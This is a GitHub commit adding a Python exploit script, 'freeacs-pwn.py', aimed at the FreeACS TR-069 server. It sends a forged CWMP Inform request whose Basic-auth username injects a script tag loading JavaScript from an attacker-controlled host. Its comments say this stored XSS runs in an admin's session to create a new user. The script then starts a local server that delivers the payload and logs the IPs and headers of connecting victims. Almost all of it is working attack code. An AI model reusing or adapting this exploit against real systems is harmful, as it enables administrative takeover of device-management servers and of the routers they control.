Skip to content

Commit 3e97da5

Browse files
author
David Davidson
authored
Create freeacs-pwn.py
1 parent 4622ac7 commit 3e97da5

File tree

1 file changed

+79
-0
lines changed

1 file changed

+79
-0
lines changed

FreeACS-Pwn/freeacs-pwn.py

Lines changed: 79 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,79 @@
1+
#!/usr/bin/python
2+
# worlds cheapest exploit - made by copypasting from stackoverflow.
3+
# released at BSides Edinburgh.
4+
# Exploits freeacs - freeacs.com
5+
# TL;DR:
6+
# - Persistent XSS via CWMP Notify message
7+
# - XSS fires in admin session and adds a user
8+
# HACK THE PLANET!
9+
# Darren Martyn - @info_dox - 7th March 2017
10+
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
11+
import requests
12+
13+
class myHandler(BaseHTTPRequestHandler):
14+
def do_GET(self):
15+
print "{+} Got call from %s - you probably pwned one ;)" %(self.client_address[0])
16+
print "{+} Dumping headers for extra info...\n%s" %(self.headers)
17+
f = open("poc.js", "rb")
18+
poc = f.read()
19+
f.close()
20+
self.send_response(200)
21+
self.send_header('Content-type','application/javascript')
22+
self.end_headers()
23+
self.wfile.write(poc)
24+
return
25+
26+
27+
def runserver(port):
28+
try:
29+
server = HTTPServer(('', port), myHandler)
30+
print 'Started httpserver on port ' , port
31+
server.serve_forever()
32+
33+
except KeyboardInterrupt:
34+
print '^C received, shutting down the web server'
35+
server.socket.close()
36+
37+
print "{+} First we fire our XSS payload to the target device."
38+
from requests.auth import HTTPBasicAuth
39+
url = "http://192.168.1.7:8080/tr069/"
40+
print "{+} Target is: %s" %(url)
41+
xml = """\
42+
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema/instance/" xmlns:xsd="http://www.w3.org/2001/XMLSchema/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
43+
<soap:Body>
44+
<cwmp:Inform>
45+
<DeviceId xsi:type="cwmp:DeviceIdStruct">
46+
<Manufacturer xsi:type="xsd:string[64]">Serafeim</Manufacturer>
47+
<OUI xsi:type="xsd:string[6]">123456</OUI>
48+
<ProductClass xsi:type="xsd:string[64]">Testing</ProductClass>
49+
<SerialNumber xsi:type="xsd:string[64]">12312131</SerialNumber>
50+
</DeviceId>
51+
<Event soap:arrayType="cwmp:EventStruct[1]">
52+
<EventCode xsi:type="xsd:string[64]">6 CONNECTION REQUEST</EventCode>
53+
</Event>
54+
<MaxEnvelopes xsi:type="xsd:unsignedInt">10</MaxEnvelopes>
55+
<CurrentTime xsi:type="xsd:dateTime">2017-03-05T16:29:48</CurrentTime>
56+
<RetryCount xsi:type="xsd:unsignedInt">0</RetryCount>
57+
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[2]">
58+
<ParameterValueStruct>
59+
<Name xsi:type="xsd:string">InternetGatewayDevice.ManagementServer.URL</Name>
60+
<Value xsi:type="xsd:string">https://127.0.0.1:80</Value>
61+
</ParameterValueStruct>
62+
<ParameterValueStruct>
63+
<Name xsi:type="xsd:string">InternetGatewayDevice.ManagementServer.ConnectionRequestURL</Name>
64+
<Value xsi:type="xsd:string">http://127.0.0.1:24582/CONNECT</Value>
65+
</ParameterValueStruct>
66+
</ParameterList>
67+
</cwmp:Inform>
68+
</soap:Body>
69+
</soap:Envelope>"""
70+
headers = {'SOAPAction': ''}
71+
#auth=HTTPBasicAuth('"/><script>alert("xss ;)")</script>', 'pass')
72+
auth=HTTPBasicAuth('"/><script src="//kitten/x.js"></script>', 'pass') # XXX: CHANGE THIS URL
73+
r = requests.post(url=url, data=xml, headers=headers, auth=auth)
74+
print r.headers
75+
print r.status_code
76+
print r.text
77+
##
78+
print "{+} Now we launch our XSS serving server ;)"
79+
runserver(port=80)

0 commit comments

Comments
 (0)